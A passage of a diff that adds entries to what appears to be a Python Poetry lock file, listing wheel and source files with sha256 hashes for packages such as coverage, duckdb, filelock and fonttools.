+ {file = "coverage-7.6.1-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:c3c02d12f837d9683e5ab2f3d9844dc57655b92c74e286c262e0fc54213c216d"},
+ {file = "coverage-7.6.1-cp312-cp312-win32.whl", hash = "sha256:e05882b70b87a18d937ca6768ff33cc3f72847cbc4de4491c8e73880766718e5"},
+ {file = "coverage-7.6.1-cp312-cp312-win_amd64.whl", hash = "sha256:b5d7b556859dd85f3a541db6a4e0167b86e7273e1cdc973e5b175166bb634fdb"},
+ {file = "coverage-7.6.1-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:a4acd025ecc06185ba2b801f2de85546e0b8ac787cf9d3b06e7e2a69f925b106"},
+ {file = "coverage-7.6.1-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:a6d3adcf24b624a7b778533480e32434a39ad8fa30c315208f6d3e5542aeb6e9"},
+ {file = "coverage-7.6.1-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d0c212c49b6c10e6951362f7c6df3329f04c2b1c28499563d4035d964ab8e08c"},
+ {file = "coverage-7.6.1-cp313-cp313-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:6e81d7a3e58882450ec4186ca59a3f20a5d4440f25b1cff6f0902ad890e6748a"},
+ {file = "coverage-7.6.1-cp313-cp313-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:78b260de9790fd81e69401c2dc8b17da47c8038176a79092a89cb2b7d945d060"},
+ {file = "coverage-7.6.1-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:a78d169acd38300060b28d600344a803628c3fd585c912cacc9ea8790fe96862"},
+ {file = "coverage-7.6.1-cp313-cp313-musllinux_1_2_i686.whl", hash = "sha256:2c09f4ce52cb99dd7505cd0fc8e0e37c77b87f46bc9c1eb03fe3bc9991085388"},
+ {file = "coverage-7.6.1-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:6878ef48d4227aace338d88c48738a4258213cd7b74fd9a3d4d7582bb1d8a155"},
+ {file = "coverage-7.6.1-cp313-cp313-win32.whl", hash = "sha256:44df346d5215a8c0e360307d46ffaabe0f5d3502c8a1cefd700b34baf31d411a"},
+ {file = "coverage-7.6.1-cp313-cp313-win_amd64.whl", hash = "sha256:8284cf8c0dd272a247bc154eb6c95548722dce90d098c17a883ed36e67cdb129"},
+ {file = "coverage-7.6.1-cp313-cp313t-macosx_10_13_x86_64.whl", hash = "sha256:d3296782ca4eab572a1a4eca686d8bfb00226300dcefdf43faa25b5242ab8a3e"},
+ {file = "coverage-7.6.1-cp313-cp313t-macosx_11_0_arm64.whl", hash = "sha256:502753043567491d3ff6d08629270127e0c31d4184c4c8d98f92c26f65019962"},
+ {file = "coverage-7.6.1-cp313-cp313t-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6a89ecca80709d4076b95f89f308544ec8f7b4727e8a547913a35f16717856cb"},
+ {file = "coverage-7.6.1-cp313-cp313t-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a318d68e92e80af8b00fa99609796fdbcdfef3629c77c6283566c6f02c6d6704"},
+ {file = "coverage-7.6.1-cp313-cp313t-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:13b0a73a0896988f053e4fbb7de6d93388e6dd292b0d87ee51d106f2c11b465b"},
+ {file = "coverage-7.6.1-cp313-cp313t-musllinux_1_2_aarch64.whl", hash = "sha256:4421712dbfc5562150f7554f13dde997a2e932a6b5f352edcce948a815efee6f"},
+ {file = "coverage-7.6.1-cp313-cp313t-musllinux_1_2_i686.whl", hash = "sha256:166811d20dfea725e2e4baa71fffd6c968a958577848d2131f39b60043400223"},
+ {file = "coverage-7.6.1-cp313-cp313t-musllinux_1_2_x86_64.whl", hash = "sha256:225667980479a17db1048cb2bf8bfb39b8e5be8f164b8f6628b64f78a72cf9d3"},
+ {file = "coverage-7.6.1-cp313-cp313t-win32.whl", hash = "sha256:170d444ab405852903b7d04ea9ae9b98f98ab6d7e63e1115e82620807519797f"},
+ {file = "coverage-7.6.1-cp313-cp313t-win_amd64.whl", hash = "sha256:b9f222de8cded79c49bf184bdbc06630d4c58eec9459b939b4a690c82ed05657"},
+ {file = "coverage-7.6.1-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:6db04803b6c7291985a761004e9060b2bca08da6d04f26a7f2294b8623a0c1a0"},
+ {file = "coverage-7.6.1-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:f1adfc8ac319e1a348af294106bc6a8458a0f1633cc62a1446aebc30c5fa186a"},
+ {file = "coverage-7.6.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a95324a9de9650a729239daea117df21f4b9868ce32e63f8b650ebe6cef5595b"},
+ {file = "coverage-7.6.1-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:b43c03669dc4618ec25270b06ecd3ee4fa94c7f9b3c14bae6571ca00ef98b0d3"},
+ {file = "coverage-7.6.1-cp38-cp38-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:8929543a7192c13d177b770008bc4e8119f2e1f881d563fc6b6305d2d0ebe9de"},
+ {file = "coverage-7.6.1-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:a09ece4a69cf399510c8ab25e0950d9cf2b42f7b3cb0374f95d2e2ff594478a6"},
+ {file = "coverage-7.6.1-cp38-cp38-musllinux_1_2_i686.whl", hash = "sha256:9054a0754de38d9dbd01a46621636689124d666bad1936d76c0341f7d71bf569"},
+ {file = "coverage-7.6.1-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:0dbde0f4aa9a16fa4d754356a8f2e36296ff4d83994b2c9d8398aa32f222f989"},
+ {file = "coverage-7.6.1-cp38-cp38-win32.whl", hash = "sha256:da511e6ad4f7323ee5702e6633085fb76c2f893aaf8ce4c51a0ba4fc07580ea7"},
+ {file = "coverage-7.6.1-cp38-cp38-win_amd64.whl", hash = "sha256:3f1156e3e8f2872197af3840d8ad307a9dd18e615dc64d9ee41696f287c57ad8"},
+ {file = "coverage-7.6.1-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:abd5fd0db5f4dc9289408aaf34908072f805ff7792632250dcb36dc591d24255"},
+ {file = "coverage-7.6.1-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:547f45fa1a93154bd82050a7f3cddbc1a7a4dd2a9bf5cb7d06f4ae29fe94eaf8"},
+ {file = "coverage-7.6.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:645786266c8f18a931b65bfcefdbf6952dd0dea98feee39bd188607a9d307ed2"},
+ {file = "coverage-7.6.1-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:9e0b2df163b8ed01d515807af24f63de04bebcecbd6c3bfeff88385789fdf75a"},
+ {file = "coverage-7.6.1-cp39-cp39-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:609b06f178fe8e9f89ef676532760ec0b4deea15e9969bf754b37f7c40326dbc"},
+ {file = "coverage-7.6.1-cp39-cp39-musllinux_1_2_aarch64.whl", hash = "sha256:702855feff378050ae4f741045e19a32d57d19f3e0676d589df0575008ea5004"},
+ {file = "coverage-7.6.1-cp39-cp39-musllinux_1_2_i686.whl", hash = "sha256:2bdb062ea438f22d99cba0d7829c2ef0af1d768d1e4a4f528087224c90b132cb"},
+ {file = "coverage-7.6.1-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:9c56863d44bd1c4fe2abb8a4d6f5371d197f1ac0ebdee542f07f35895fc07f36"},
+ {file = "coverage-7.6.1-cp39-cp39-win32.whl", hash = "sha256:6e2cd258d7d927d09493c8df1ce9174ad01b381d4729a9d8d4e38670ca24774c"},
+ {file = "coverage-7.6.1-cp39-cp39-win_amd64.whl", hash = "sha256:06a737c882bd26d0d6ee7269b20b12f14a8704807a01056c80bb881a4b2ce6ca"},
+ {file = "coverage-7.6.1-pp38.pp39.pp310-none-any.whl", hash = "sha256:e9a6e0eb86070e8ccaedfbd9d38fec54864f3125ab95419970575b42af7541df"},
+ {file = "coverage-7.6.1.tar.gz", hash = "sha256:953510dfb7b12ab69d20135a0662397f077c59b1e6379a768e97c59d852ee51d"},
+]
+
+[package.extras]
+toml = ["tomli"]
+
+[[package]]
+name = "cycler"
+version = "0.12.1"
+description = "Composable style cycles"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "cycler-0.12.1-py3-none-any.whl", hash = "sha256:85cef7cff222d8644161529808465972e51340599459b8ac3ccbac5a854e0d30"},
+ {file = "cycler-0.12.1.tar.gz", hash = "sha256:88bb128f02ba341da8ef447245a9e138fae777f6a23943da4540077d3601eb1c"},
+]
+
+[package.extras]
+docs = ["ipython", "matplotlib", "numpydoc", "sphinx"]
+tests = ["pytest", "pytest-cov", "pytest-xdist"]
+
+[[package]]
+name = "distlib"
+version = "0.3.9"
+description = "Distribution utilities"
+optional = false
+python-versions = "*"
+files = [
+ {file = "distlib-0.3.9-py2.py3-none-any.whl", hash = "sha256:47f8c22fd27c27e25a65601af709b38e4f0a45ea4fc2e710f65755fa8caaaf87"},
+ {file = "distlib-0.3.9.tar.gz", hash = "sha256:a60f20dea646b8a33f3e7772f74dc0b2d0772d2837ee1342a00645c81edf9403"},
+]
+
+[[package]]
+name = "duckdb"
+version = "1.1.3"
+description = "DuckDB in-process database"
+optional = false
+python-versions = ">=3.7.0"
+files = [
+ {file = "duckdb-1.1.3-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:1c0226dc43e2ee4cc3a5a4672fddb2d76fd2cf2694443f395c02dd1bea0b7fce"},
+ {file = "duckdb-1.1.3-cp310-cp310-macosx_12_0_universal2.whl", hash = "sha256:7c71169fa804c0b65e49afe423ddc2dc83e198640e3b041028da8110f7cd16f7"},
+ {file = "duckdb-1.1.3-cp310-cp310-macosx_12_0_x86_64.whl", hash = "sha256:872d38b65b66e3219d2400c732585c5b4d11b13d7a36cd97908d7981526e9898"},
+ {file = "duckdb-1.1.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:25fb02629418c0d4d94a2bc1776edaa33f6f6ccaa00bd84eb96ecb97ae4b50e9"},
+ {file = "duckdb-1.1.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9e3f5cd604e7c39527e6060f430769b72234345baaa0987f9500988b2814f5e4"},
+ {file = "duckdb-1.1.3-cp310-cp310-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:08935700e49c187fe0e9b2b86b5aad8a2ccd661069053e38bfaed3b9ff795efd"},
+ {file = "duckdb-1.1.3-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:f9b47036945e1db32d70e414a10b1593aec641bd4c5e2056873d971cc21e978b"},
+ {file = "duckdb-1.1.3-cp310-cp310-win_amd64.whl", hash = "sha256:35c420f58abc79a68a286a20fd6265636175fadeca1ce964fc8ef159f3acc289"},
+ {file = "duckdb-1.1.3-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:4f0e2e5a6f5a53b79aee20856c027046fba1d73ada6178ed8467f53c3877d5e0"},
+ {file = "duckdb-1.1.3-cp311-cp311-macosx_12_0_universal2.whl", hash = "sha256:911d58c22645bfca4a5a049ff53a0afd1537bc18fedb13bc440b2e5af3c46148"},
+ {file = "duckdb-1.1.3-cp311-cp311-macosx_12_0_x86_64.whl", hash = "sha256:c443d3d502335e69fc1e35295fcfd1108f72cb984af54c536adfd7875e79cee5"},
+ {file = "duckdb-1.1.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:0a55169d2d2e2e88077d91d4875104b58de45eff6a17a59c7dc41562c73df4be"},
+ {file = "duckdb-1.1.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9d0767ada9f06faa5afcf63eb7ba1befaccfbcfdac5ff86f0168c673dd1f47aa"},
+ {file = "duckdb-1.1.3-cp311-cp311-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:51c6d79e05b4a0933672b1cacd6338f882158f45ef9903aef350c4427d9fc898"},
+ {file = "duckdb-1.1.3-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:183ac743f21c6a4d6adfd02b69013d5fd78e5e2cd2b4db023bc8a95457d4bc5d"},
+ {file = "duckdb-1.1.3-cp311-cp311-win_amd64.whl", hash = "sha256:a30dd599b8090ea6eafdfb5a9f1b872d78bac318b6914ada2d35c7974d643640"},
+ {file = "duckdb-1.1.3-cp312-cp312-macosx_12_0_arm64.whl", hash = "sha256:a433ae9e72c5f397c44abdaa3c781d94f94f4065bcbf99ecd39433058c64cb38"},
+ {file = "duckdb-1.1.3-cp312-cp312-macosx_12_0_universal2.whl", hash = "sha256:d08308e0a46c748d9c30f1d67ee1143e9c5ea3fbcccc27a47e115b19e7e78aa9"},
+ {file = "duckdb-1.1.3-cp312-cp312-macosx_12_0_x86_64.whl", hash = "sha256:5d57776539211e79b11e94f2f6d63de77885f23f14982e0fac066f2885fcf3ff"},
+ {file = "duckdb-1.1.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:e59087dbbb63705f2483544e01cccf07d5b35afa58be8931b224f3221361d537"},
+ {file = "duckdb-1.1.3-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4ebf5f60ddbd65c13e77cddb85fe4af671d31b851f125a4d002a313696af43f1"},
+ {file = "duckdb-1.1.3-cp312-cp312-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:e4ef7ba97a65bd39d66f2a7080e6fb60e7c3e41d4c1e19245f90f53b98e3ac32"},
+ {file = "duckdb-1.1.3-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:f58db1b65593ff796c8ea6e63e2e144c944dd3d51c8d8e40dffa7f41693d35d3"},
+ {file = "duckdb-1.1.3-cp312-cp312-win_amd64.whl", hash = "sha256:e86006958e84c5c02f08f9b96f4bc26990514eab329b1b4f71049b3727ce5989"},
+ {file = "duckdb-1.1.3-cp313-cp313-macosx_12_0_arm64.whl", hash = "sha256:0897f83c09356206ce462f62157ce064961a5348e31ccb2a557a7531d814e70e"},
+ {file = "duckdb-1.1.3-cp313-cp313-macosx_12_0_universal2.whl", hash = "sha256:cddc6c1a3b91dcc5f32493231b3ba98f51e6d3a44fe02839556db2b928087378"},
+ {file = "duckdb-1.1.3-cp313-cp313-macosx_12_0_x86_64.whl", hash = "sha256:1d9ab6143e73bcf17d62566e368c23f28aa544feddfd2d8eb50ef21034286f24"},
+ {file = "duckdb-1.1.3-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2f073d15d11a328f2e6d5964a704517e818e930800b7f3fa83adea47f23720d3"},
+ {file = "duckdb-1.1.3-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:d5724fd8a49e24d730be34846b814b98ba7c304ca904fbdc98b47fa95c0b0cee"},
+ {file = "duckdb-1.1.3-cp313-cp313-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:51e7dbd968b393343b226ab3f3a7b5a68dee6d3fe59be9d802383bf916775cb8"},
+ {file = "duckdb-1.1.3-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:00cca22df96aa3473fe4584f84888e2cf1c516e8c2dd837210daec44eadba586"},
+ {file = "duckdb-1.1.3-cp313-cp313-win_amd64.whl", hash = "sha256:77f26884c7b807c7edd07f95cf0b00e6d47f0de4a534ac1706a58f8bc70d0d31"},
+ {file = "duckdb-1.1.3-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a4748635875fc3c19a7320a6ae7410f9295557450c0ebab6d6712de12640929a"},
+ {file = "duckdb-1.1.3-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b74e121ab65dbec5290f33ca92301e3a4e81797966c8d9feef6efdf05fc6dafd"},
+ {file = "duckdb-1.1.3-cp37-cp37m-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:9c619e4849837c8c83666f2cd5c6c031300cd2601e9564b47aa5de458ff6e69d"},
+ {file = "duckdb-1.1.3-cp37-cp37m-win_amd64.whl", hash = "sha256:0ba6baa0af33ded836b388b09433a69b8bec00263247f6bf0a05c65c897108d3"},
+ {file = "duckdb-1.1.3-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:ecb1dc9062c1cc4d2d88a5e5cd8cc72af7818ab5a3c0f796ef0ffd60cfd3efb4"},
+ {file = "duckdb-1.1.3-cp38-cp38-macosx_12_0_universal2.whl", hash = "sha256:5ace6e4b1873afdd38bd6cc8fcf90310fb2d454f29c39a61d0c0cf1a24ad6c8d"},
+ {file = "duckdb-1.1.3-cp38-cp38-macosx_12_0_x86_64.whl", hash = "sha256:a1fa0c502f257fa9caca60b8b1478ec0f3295f34bb2efdc10776fc731b8a6c5f"},
+ {file = "duckdb-1.1.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6411e21a2128d478efbd023f2bdff12464d146f92bc3e9c49247240448ace5a6"},
+ {file = "duckdb-1.1.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c5336939d83837af52731e02b6a78a446794078590aa71fd400eb17f083dda3e"},
+ {file = "duckdb-1.1.3-cp38-cp38-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:f549af9f7416573ee48db1cf8c9d27aeed245cb015f4b4f975289418c6cf7320"},
+ {file = "duckdb-1.1.3-cp38-cp38-win_amd64.whl", hash = "sha256:2141c6b28162199999075d6031b5d63efeb97c1e68fb3d797279d31c65676269"},
+ {file = "duckdb-1.1.3-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:09c68522c30fc38fc972b8a75e9201616b96ae6da3444585f14cf0d116008c95"},
+ {file = "duckdb-1.1.3-cp39-cp39-macosx_12_0_universal2.whl", hash = "sha256:8ee97ec337794c162c0638dda3b4a30a483d0587deda22d45e1909036ff0b739"},
+ {file = "duckdb-1.1.3-cp39-cp39-macosx_12_0_x86_64.whl", hash = "sha256:a1f83c7217c188b7ab42e6a0963f42070d9aed114f6200e3c923c8899c090f16"},
+ {file = "duckdb-1.1.3-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1aa3abec8e8995a03ff1a904b0e66282d19919f562dd0a1de02f23169eeec461"},
+ {file = "duckdb-1.1.3-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:80158f4c7c7ada46245837d5b6869a336bbaa28436fbb0537663fa324a2750cd"},
+ {file = "duckdb-1.1.3-cp39-cp39-manylinux_2_24_aarch64.manylinux_2_28_aarch64.whl", hash = "sha256:647f17bd126170d96a38a9a6f25fca47ebb0261e5e44881e3782989033c94686"},
+ {file = "duckdb-1.1.3-cp39-cp39-musllinux_1_2_x86_64.whl", hash = "sha256:252d9b17d354beb9057098d4e5d5698e091a4f4a0d38157daeea5fc0ec161670"},
+ {file = "duckdb-1.1.3-cp39-cp39-win_amd64.whl", hash = "sha256:eeacb598120040e9591f5a4edecad7080853aa8ac27e62d280f151f8c862afa3"},
+ {file = "duckdb-1.1.3.tar.gz", hash = "sha256:68c3a46ab08836fe041d15dcbf838f74a990d551db47cb24ab1c4576fc19351c"},
+]
+
+[[package]]
+name = "et-xmlfile"
+version = "2.0.0"
+description = "An implementation of lxml.xmlfile for the standard library"
+optional = true
+python-versions = ">=3.8"
+files = [
+ {file = "et_xmlfile-2.0.0-py3-none-any.whl", hash = "sha256:7a91720bc756843502c3b7504c77b8fe44217c85c537d85037f0f536151b2caa"},
+ {file = "et_xmlfile-2.0.0.tar.gz", hash = "sha256:dab3f4764309081ce75662649be815c4c9081e88f0837825f90fd28317d4da54"},
+]
+
+[[package]]
+name = "exceptiongroup"
+version = "1.2.2"
+description = "Backport of PEP 654 (exception groups)"
+optional = false
+python-versions = ">=3.7"
+files = [
+ {file = "exceptiongroup-1.2.2-py3-none-any.whl", hash = "sha256:3111b9d131c238bec2f8f516e123e14ba243563fb135d3fe885990585aa7795b"},
+ {file = "exceptiongroup-1.2.2.tar.gz", hash = "sha256:47c2edf7c6738fafb49fd34290706d1a1a2f4d1c6df275526b62cbb4aa5393cc"},
+]
+
+[package.extras]
+test = ["pytest (>=6)"]
+
+[[package]]
+name = "filelock"
+version = "3.16.1"
+description = "A platform independent file lock."
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "filelock-3.16.1-py3-none-any.whl", hash = "sha256:2082e5703d51fbf98ea75855d9d5527e33d8ff23099bec374a134febee6946b0"},
+ {file = "filelock-3.16.1.tar.gz", hash = "sha256:c249fbfcd5db47e5e2d6d62198e565475ee65e4831e2561c8e313fa7eb961435"},
+]
+
+[package.extras]
+docs = ["furo (>=2024.8.6)", "sphinx (>=8.0.2)", "sphinx-autodoc-typehints (>=2.4.1)"]
+testing = ["covdefaults (>=2.3)", "coverage (>=7.6.1)", "diff-cover (>=9.2)", "pytest (>=8.3.3)", "pytest-asyncio (>=0.24)", "pytest-cov (>=5)", "pytest-mock (>=3.14)", "pytest-timeout (>=2.3.1)", "virtualenv (>=20.26.4)"]
+typing = ["typing-extensions (>=4.12.2)"]
+
+[[package]]
+name = "fonttools"
+version = "4.55.3"
+description = "Tools to manipulate font files"
+optional = false
+python-versions = ">=3.8"
+files = [
+ {file = "fonttools-4.55.3-cp310-cp310-macosx_10_9_universal2.whl", hash = "sha256:1dcc07934a2165ccdc3a5a608db56fb3c24b609658a5b340aee4ecf3ba679dc0"},
+ {file = "fonttools-4.55.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:f7d66c15ba875432a2d2fb419523f5d3d347f91f48f57b8b08a2dfc3c39b8a3f"},
+ {file = "fonttools-4.55.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:27e4ae3592e62eba83cd2c4ccd9462dcfa603ff78e09110680a5444c6925d841"},
+ {file = "fonttools-4.55.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:62d65a3022c35e404d19ca14f291c89cc5890032ff04f6c17af0bd1927299674"},
+ {file = "fonttools-4.55.3-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:d342e88764fb201286d185093781bf6628bbe380a913c24adf772d901baa8276"},
+ {file = "fonttools-4.55.3-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:dd68c87a2bfe37c5b33bcda0fba39b65a353876d3b9006fde3adae31f97b3ef5"},
+ {file = "fonttools-4.55.3-cp310-cp310-win32.whl", hash = "sha256:1bc7ad24ff98846282eef1cbeac05d013c2154f977a79886bb943015d2b1b261"},
+ {file = "fonttools-4.55.3-cp310-cp310-win_amd64.whl", hash = "sha256:b54baf65c52952db65df39fcd4820668d0ef4766c0ccdf32879b77f7c804d5c5"},
+ {file = "fonttools-4.55.3-cp311-cp311-macosx_10_9_universal2.whl", hash = "sha256:8c4491699bad88efe95772543cd49870cf756b019ad56294f6498982408ab03e"},
+ {file = "fonttools-4.55.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:5323a22eabddf4b24f66d26894f1229261021dacd9d29e89f7872dd8c63f0b8b"},
+ {file = "fonttools-4.55.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:5480673f599ad410695ca2ddef2dfefe9df779a9a5cda89503881e503c9c7d90"},
+ {file = "fonttools-4.55.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:da9da6d65cd7aa6b0f806556f4985bcbf603bf0c5c590e61b43aa3e5a0f822d0"},
+ {file = "fonttools-4.55.3-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:e894b5bd60d9f473bed7a8f506515549cc194de08064d829464088d23097331b"},
+ {file = "fonttools-4.55.3-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:aee3b57643827e237ff6ec6d28d9ff9766bd8b21e08cd13bff479e13d4b14765"},
+ {file = "fonttools-4.55.3-cp311-cp311-win32.whl", hash = "sha256:eb6ca911c4c17eb51853143624d8dc87cdcdf12a711fc38bf5bd21521e79715f"},
+ {file = "fonttools-4.55.3-cp311-cp311-win_amd64.whl", hash = "sha256:6314bf82c54c53c71805318fcf6786d986461622dd926d92a465199ff54b1b72"},
+ {file = "fonttools-4.55.3-cp312-cp312-macosx_10_13_universal2.whl", hash = "sha256:f9e736f60f4911061235603a6119e72053073a12c6d7904011df2d8fad2c0e35"},
+ {file = "fonttools-4.55.3-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:7a8aa2c5e5b8b3bcb2e4538d929f6589a5c6bdb84fd16e2ed92649fb5454f11c"},
+ {file = "fonttools-4.55.3-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:07f8288aacf0a38d174445fc78377a97fb0b83cfe352a90c9d9c1400571963c7"},
+ {file = "fonttools-4.55.3-cp312-cp312-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b8d5e8916c0970fbc0f6f1bece0063363bb5857a7f170121a4493e31c3db3314"},
+ {file = "fonttools-4.55.3-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:ae3b6600565b2d80b7c05acb8e24d2b26ac407b27a3f2e078229721ba5698427"},
+ {file = "fonttools-4.55.3-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:54153c49913f45065c8d9e6d0c101396725c5621c8aee744719300f79771d75a"},
+ {file = "fonttools-4.55.3-cp312-cp312-win32.whl", hash = "sha256:827e95fdbbd3e51f8b459af5ea10ecb4e30af50221ca103bea68218e9615de07"},
+ {file = "fonttools-4.55.3-cp312-cp312-win_amd64.whl", hash = "sha256:e6e8766eeeb2de759e862004aa11a9ea3d6f6d5ec710551a88b476192b64fd54"},
+ {file = "fonttools-4.55.3-cp313-cp313-macosx_10_13_universal2.whl", hash = "sha256:a430178ad3e650e695167cb53242dae3477b35c95bef6525b074d87493c4bf29"},
+ {file = "fonttools-4.55.3-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:529cef2ce91dc44f8e407cc567fae6e49a1786f2fefefa73a294704c415322a4"},
+ {file = "fonttools-4.55.3-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8e75f12c82127486fac2d8bfbf5bf058202f54bf4f158d367e41647b972342ca"},
+ {file = "fonttools-4.55.3-cp313-cp313-manylinux_2_5_x86_64.manylinux1_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:859c358ebf41db18fb72342d3080bce67c02b39e86b9fbcf1610cca14984841b"},
+ {file = "fonttools-4.55.3-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:546565028e244a701f73df6d8dd6be489d01617863ec0c6a42fa25bf45d43048"},
+ {file = "fonttools-4.55.3-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:aca318b77f23523309eec4475d1fbbb00a6b133eb766a8bdc401faba91261abe"},
+ {file = "fonttools-4.55.3-cp313-cp313-win32.whl", hash = "sha256:8c5ec45428edaa7022f1c949a632a6f298edc7b481312fc7dc258921e9399628"},
+ {file = "fonttools-4.55.3-cp313-cp313-win_amd64.whl", hash = "sha256:11e5de1ee0d95af4ae23c1a138b184b7f06e0b6abacabf1d0db41c90b03d834b"},
+ {file = "fonttools-4.55.3-cp38-cp38-macosx_10_9_universal2.whl", hash = "sha256:caf8230f3e10f8f5d7593eb6d252a37caf58c480b19a17e250a63dad63834cf3"},
+ {file = "fonttools-4.55.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:b586ab5b15b6097f2fb71cafa3c98edfd0dba1ad8027229e7b1e204a58b0e09d"},
+ {file = "fonttools-4.55.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:a8c2794ded89399cc2169c4d0bf7941247b8d5932b2659e09834adfbb01589aa"},
+ {file = "fonttools-4.55.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:cf4fe7c124aa3f4e4c1940880156e13f2f4d98170d35c749e6b4f119a872551e"},
+ {file = "fonttools-4.55.3-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:86721fbc389ef5cc1e2f477019e5069e8e4421e8d9576e9c26f840dbb04678de"},
+ {file = "fonttools-4.55.3-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:89bdc5d88bdeec1b15af790810e267e8332d92561dce4f0748c2b95c9bdf3926"},
+ {file = "fonttools-4.55.3-cp38-cp38-win32.whl", hash = "sha256:bc5dbb4685e51235ef487e4bd501ddfc49be5aede5e40f4cefcccabc6e60fb4b"},
+ {file = "fonttools-4.55.3-cp38-cp38-win_amd64.whl", hash = "sha256:cd70de1a52a8ee2d1877b6293af8a2484ac82514f10b1c67c1c5762d38073e56"},
